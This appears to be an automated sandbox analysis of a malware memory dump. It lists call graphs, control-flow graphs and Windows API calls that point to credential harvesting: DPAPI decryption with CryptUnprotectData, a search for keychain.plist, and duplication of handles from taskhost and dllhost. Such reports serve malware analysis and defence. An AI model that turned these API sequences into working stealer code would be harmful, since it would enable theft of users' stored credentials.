39917->40067 39923 43b3f6 39918->39923 39928 43b4c8 39918->39928 39919->39870 40126 4393a5 17 API calls 39919->40126 39922 43af2f 40068 4233c5 16 API calls 39922->40068 40108 432878 12 API calls 39923->40108 39925 43af51 40069 423426 11 API calls 39925->40069 39927 43b4f2 40115 43a76c 21 API calls 39927->40115 39928->39927 40114 42bbd5 memcpy memcpy memcpy memset memcpy 39928->40114 39930 43af7d 40070 423426 11 API calls 39930->40070 39934 43af94 40071 423330 11 API calls 39934->40071 39935 43b529 40116 44081d 162 API calls 39935->40116 39936 43b462 40110 423330 11 API calls 39936->40110 39940 43b544 39944 43b55c 39940->39944 40117 42c02e memset 39940->40117 39941 43b428 39941->39936 40109 432b60 16 API calls 39941->40109 39942 43afca 40072 423330 11 API calls 39942->40072 39943 43b47e 39946 43b497 39943->39946 40111 42374a memcpy memset memcpy memcpy memcpy 39943->40111 40118 43a87a 162 API calls 39944->40118 40112 4233ae 11 API calls 39946->40112 39949 43afdb 40073 4233ae 11 API calls 39949->40073 39952 43b4b1 40113 423399 11 API calls 39952->40113 39954 43b56c 39957 43b58a 39954->39957 40119 423330 11 API calls 39954->40119 39956 43afee 40074 44081d 162 API calls 39956->40074 40120 440f84 12 API calls 39957->40120 39958 43b4c1 40122 42db80 162 API calls 39958->40122 39963 43b592 40121 43a82f 16 API calls 39963->40121 39966 43b5b4 40123 438c4e 162 API calls 39966->40123 39968 43b5cf 40124 42c02e memset 39968->40124 39970 43b005 39970->39870 39975 43b01f 39970->39975 40075 42d836 162 API calls 39970->40075 39971 43b1ef 40085 4233c5 16 API calls 39971->40085 39973 43b212 40086 423330 11 API calls 39973->40086 39975->39971 40083 423330 11 API calls 39975->40083 40084 42d71d 162 API calls 39975->40084 39977 43b087 40076 4233ae 11 API calls 39977->40076 39980 43b22a 40087 42ccb5 11 API calls 39980->40087 39983 43b23f 40088 4233ae 11 API calls 39983->40088 39984 43b10f 40079 423330 11 API calls 39984->40079 39986 43b257 40089 4233ae 11 API calls 39986->40089 39990 43b129 40080 4233ae 11 API calls 39990->40080 39991 43b26e 40090 4233ae 11 API calls 39991->40090 39994 43b09a 39994->39984 40077 42cc15 19 API calls 39994->40077 40078 4233ae 11 API calls 39994->40078 39996 43b282 40091 43a87a 162 API calls 39996->40091 39997 43b13c 40081 440f84 12 API calls 39997->40081 39999 43b29d 40092 423330 11 API calls 39999->40092 40002 43b15f 40082 4233ae 11 API calls 40002->40082 40003 43b2af 40005 43b2b8 40003->40005 40006 43b2ce 40003->40006 40093 4233ae 11 API calls 40005->40093 40094 440f84 12 API calls 40006->40094 40009 43b2c9 40096 4233ae 11 API calls 40009->40096 40010 43b2da 40095 42370b memset memcpy memset 40010->40095 40013 43b2f9 40097 423330 11 API calls 40013->40097 40015 43b30b 40098 423330 11 API calls 40015->40098 40017 43b325 40099 423399 11 API calls 40017->40099 40019 43b332 40100 4233ae 11 API calls 40019->40100 40021 43b354 40101 423399 11 API calls 40021->40101 40023 43b364 40102 43a82f 16 API calls 40023->40102 40025 43b370 40103 42db80 162 API calls 40025->40103 40027 43b380 40104 438c4e 162 API calls 40027->40104 40029 43b39e 40105 423399 11 API calls 40029->40105 40031 43b3ae 40106 43a76c 21 API calls 40031->40106 40033 43b3c3 40107 423399 11 API calls 40033->40107 40035->39856 40036->39858 40037->39859 40039 43a6f5 40038->40039 40040 43a765 40038->40040 40039->40040 40127 42a115 40039->40127 40040->39870 40047 4397fd memset 40040->40047 40044 43a73d 40044->40040 40045 42a115 146 API calls 40044->40045 40045->40040 40046->39865 40047->39873 40048->39870 40049->39888 40050->39877 40051->39881 40052->39878 40053->39882 40054->39886 40055->39890 40056->39892 40057->39895 40058->39902 40059->39901 40060->39906 40061->39914 40062->39899 40063->39907 40064->39910 40065->39913 40066->39913 40067->39922 40068->39925 40069->39930 40070->39934 40071->39942 40072->39949 40073->39956 40074->39970 40075->39977 40076->39994 40077->39994 40078->39994 40079->39990 40080->39997 40081->40002 40082->39975 40083->39975 40084->39975 40085->39973 40086->39980 40087->39983 40088->39986 40089->39991 40090->39996 40091->39999 40092->40003 40093->40009 40094->40010 40095->40009 40096->40013 40097->40015 40098->40017 40099->40019 40100->40021 40101->40023 40102->40025 40103->40027 40104->40029 40105->40031 40106->40033 40107->39914 40108->39941 40109->39936 40110->39943 40111->39946 40112->39952 40113->39958 40114->39927 40115->39935 40116->39940 40117->39944 40118->39954 40119->39957 40120->39963 40121->39958 40122->39966 40123->39968 40124->39914 40125->39919 40126->39870 40128 42a175 40127->40128 40130 42a122 40127->40130 40128->40040 40133 42b13b 146 API calls 40128->40133 40130->40128 40131 42a115 146 API calls 40130->40131 40134 43a174 40130->40134 40158 42a0a8 146 API calls 40130->40158 40131->40130 40133->40044 40148 43a196 40134->40148 40149 43a19e 40134->40149 40135 43a306 40135->40148 40172 4388c4 14 API calls 40135->40172 40138 42a115 146 API calls 40138->40149 40139 415a91 memset 40139->40149 40140 43a642 40140->40148 40177 4169a7 11 API calls 40140->40177 40144 43a635 40176 42c02e memset 40144->40176 40148->40130 40149->40135 40149->40138 40149->40139 40149->40148 40159 42ff8c 40149->40159 40167 4165ff 11 API calls 40149->40167 40168 439504 13 API calls 40149->40168 40169 4312d0 146 API calls 40149->40169 40170 42be4c memcpy memcpy memcpy memset memcpy 40149->40170 40171 43a121 11 API calls 40149->40171 40151 42bf4c 14 API calls 40153 43a325 40151->40153 40152 4169a7 11 API calls 40152->40153 40153->40140 40153->40144 40153->40148 40153->40151 40153->40152 40154 42b5b5 memset memcpy 40153->40154 40173 42b63e 14 API calls 40153->40173 40174 4165ff 11 API calls 40153->40174 40175 42bfcf memcpy 40153->40175 40154->40153 40158->40130 40178 43817e 40159->40178 40161 42ff99 40162 42ffe3 40161->40162 40163 42ffd0 40161->40163 40166 42ff9d 40161->40166 40183 4169a7 11 API calls 40162->40183 40182 4169a7 11 API calls 40163->40182 40166->40149 40167->40149 40168->40149 40169->40149 40170->40149 40171->40149 40172->40153 40173->40153 40174->40153 40175->40153 40176->40140 40177->40148 40179 438187 40178->40179 40181 438192 40178->40181 40184 4380f6 40179->40184 40181->40161 40182->40166 40183->40166 40186 43811f 40184->40186 40185 438164 40185->40181 40186->40185 40189 437e5e 40186->40189 40212 4300e8 memset memset memcpy 40186->40212 40213 437d3c 40189->40213 40191 437ea9 40192 437eb3 40191->40192 40198 437f22 40191->40198 40228 41f432 40191->40228 40192->40186 40195 437f06 40239 415c56 11 API calls 40195->40239 40197 437f95 40240 415c56 11 API calls 40197->40240 40199 437f7f 40198->40199 40200 432d4e 3 API calls 40198->40200 40199->40197 40201 43802b 40199->40201 40200->40199 40241 4165ff 11 API calls 40201->40241 40204 438054 40242 437371 137 API calls 40204->40242 40207 43806b 40208 438094 40207->40208 40243 42f50e 137 API calls 40207->40243 40209 437fa3 40208->40209 40244 4300e8 memset memset memcpy 40208->40244 40209->40192 40245 41f638 103 API calls 40209->40245 40212->40186 40214 437d69 40213->40214 40217 437d80 40213->40217 40246 437ccb 11 API calls 40214->40246 40216 437d76 40216->40191 40217->40216 40218 437da3 40217->40218 40221 437d90 40217->40221 40220 438460 133 API calls 40218->40220 40224 437dcb 40220->40224 40221->40216 40250 437ccb 11 API calls 40221->40250 40222 437de8 40249 424f26 122 API calls 40222->40249 40224->40222 40247 444283 13 API calls 40224->40247 40226 437dfc 40248 437ccb 11 API calls 40226->40248 40229 41f54d 40228->40229 40235 41f44f 40228->40235 40230 41f466 40229->40230 40280 41c635 memset memset 40229->40280 40230->40195 40230->40198 40235->40230 40237 41f50b 40235->40237 40251 41f1a5 40235->40251 40276 41c06f memcmp 40235->40276 40277 41f3b1 89 API calls 40235->40277 40278 41f398 85 API calls 40235->40278 40237->40229 40237->40230 40279 41c295 85 API calls 40237->40279 40239->40192 40240->40209 40241->40204 40242->40207 40243->40208 40244->40209 40245->40192 40246->40216 40247->40226 40248->40222 40249->40216 40250->40216 40252 41bc3b 100 API calls 40251->40252 40253 41f1b4 40252->40253 40254 41edad 85 API calls 40253->40254 40261 41f282 40253->40261 40255 41f1cb 40254->40255 40256 41f1f5 memcmp 40255->40256 40257 41f20e 40255->40257 40255->40261 40256->40257 40258 41f21b memcmp 40257->40258 40257->40261 40259 41f326 40258->40259 40262 41f23d 40258->40262 40260 41ee6b 85 API calls 40259->40260 40259->40261 40260->40261 40261->40235 40262->40259 40263 41f28e memcmp 40262->40263 40265 41c8df 55 API calls 40262->40265 40263->40259 40264 41f2a9 40263->40264 40264->40259 40267 41f308 40264->40267 40268 41f2d8 40264->40268 40266 41f269 40265->40266 40266->40259 40269 41f287 40266->40269 40270 41f27a 40266->40270 40267->40259 40274 4446ce 11 API calls 40267->40274 40271 41ee6b 85 API calls 40268->40271 40269->40263 40272 41ee6b 85 API calls 40270->40272 40273 41f2e0 40271->40273 40272->40261 40275 41b1ca memset 40273->40275 40274->40259 40275->40261 40276->40235 40277->40235 40278->40235 40279->40229 40280->40230 40281 41493c EnumResourceNamesW 40282 44660a 40285 4465e4 40282->40285 40284 446613 40286 4465f3 __dllonexit 40285->40286 40287 4465ed _onexit 40285->40287 40286->40284 40287->40286

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 0040DDAD
                                                                                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                              • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                            • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                            • CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                                                                                            • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                            • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                            • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                            • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                            • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                            • DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                            • memset.MSVCRT ref: 0040DF5F
                                                                                                                            • CloseHandle.KERNEL32(C0000004), ref: 0040DF92
                                                                                                                            • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                            • CloseHandle.KERNEL32(00000104), ref: 0040DFF2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                            • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                            • API String ID: 2018390131-3398334509
                                                                                                                            • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                            • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                            • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                            • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                              • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                              • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                            • GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                            • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                            • free.MSVCRT ref: 00418803
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1355100292-0
                                                                                                                            • Opcode ID: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                                                                                                                            • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                            • Opcode Fuzzy Hash: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                                                                                                                            • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                            APIs
                                                                                                                            • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$Load$CryptDataDirectoryFreeSystemUnprotectmemsetwcscatwcscpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1945712969-0
                                                                                                                            • Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                            • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                            • Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                            • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                            APIs
                                                                                                                            • FindFirstFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                            • FindNextFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileFind$FirstNext
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1690352074-0
                                                                                                                            • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                            • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                            • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                            • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 0041898C
                                                                                                                            • GetSystemInfo.KERNEL32(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoSystemmemset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3558857096-0
                                                                                                                            • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                            • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                            • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                            • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-445580 call 4136c0 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 52 445879-44587c 18->52 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 87 445685 21->87 88 4456b2-4456b5 call 40b1ab 21->88 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 138 44592d-445945 call 40b6ef 24->138 139 44594a 24->139 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 53 445c7c-445c85 38->53 54 445b38-445b96 memset * 3 38->54 41->21 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 42->3 66 445585-44558c call 41366b 43->66 55 44584c-445854 call 40b1ab 45->55 56 445828 45->56 154 445665-445670 call 40b1ab 50->154 155 445643-445663 call 40a9b5 call 4087b3 50->155 67 4458a2-4458aa call 40b1ab 52->67 68 44587e 52->68 63 445d1c-445d25 53->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->69 70 445b98-445ba0 54->70 55->13 71 44582e-445847 call 40a9b5 call 4087b3 56->71 76 445fae-445fb2 63->76 77 445d2b-445d3b 63->77 159 445cf5 64->159 160 445cfc-445d03 64->160 66->42 67->19 85 445884-44589d call 40a9b5 call 4087b3 68->85 249 445c77 69->249 70->69 86 445ba2-445bcf call 4099c6 call 445403 call 445389 70->86 141 445849 71->141 93 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 77->93 94 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 77->94 146 44589f 85->146 86->53 103 44568b-4456a4 call 40a9b5 call 4087b3 87->103 106 4456ba-4456c4 88->106 165 445d67-445d6c 93->165 166 445d71-445d83 call 445093 93->166 196 445e17 94->196 197 445e1e-445e25 94->197 148 4456a9-4456b0 103->148 120 4457f9 106->120 121 4456ca-4456d3 call 413cfa call 413d4c 106->121 120->6 174 4456d8-4456f7 call 40b2cc call 413fa6 121->174 138->139 139->23 141->55 146->67 148->88 148->103 154->106 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->76 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->76 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 220 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->220 239 445e62-445e69 202->239 240 445e5b 202->240 219 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->219 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 219->76 253 445f9b 219->253 220->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->53 253->176 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->219 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 004455C2
                                                                                                                            • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                            • memset.MSVCRT ref: 0044570D
                                                                                                                            • memset.MSVCRT ref: 00445725
                                                                                                                              • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                              • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                              • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                              • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                              • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                              • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                            • memset.MSVCRT ref: 0044573D
                                                                                                                            • memset.MSVCRT ref: 00445755
                                                                                                                            • memset.MSVCRT ref: 004458CB
                                                                                                                            • memset.MSVCRT ref: 004458E3
                                                                                                                            • memset.MSVCRT ref: 0044596E
                                                                                                                            • memset.MSVCRT ref: 00445A10
                                                                                                                            • memset.MSVCRT ref: 00445A28
                                                                                                                            • memset.MSVCRT ref: 00445AC6
                                                                                                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                              • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                              • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                              • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                              • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                              • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                            • memset.MSVCRT ref: 00445B52
                                                                                                                            • memset.MSVCRT ref: 00445B6A
                                                                                                                            • memset.MSVCRT ref: 00445C9B
                                                                                                                            • memset.MSVCRT ref: 00445CB3
                                                                                                                            • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                            • memset.MSVCRT ref: 00445B82
                                                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                              • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                            • memset.MSVCRT ref: 00445986
                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AttributesCloseCreateFolderHandlePathSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                            • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                            • API String ID: 2334598624-3798722523
                                                                                                                            • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                            • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                            • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                            • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                              • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                              • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                            • SetErrorMode.KERNEL32(00008001), ref: 00412799
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                            • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
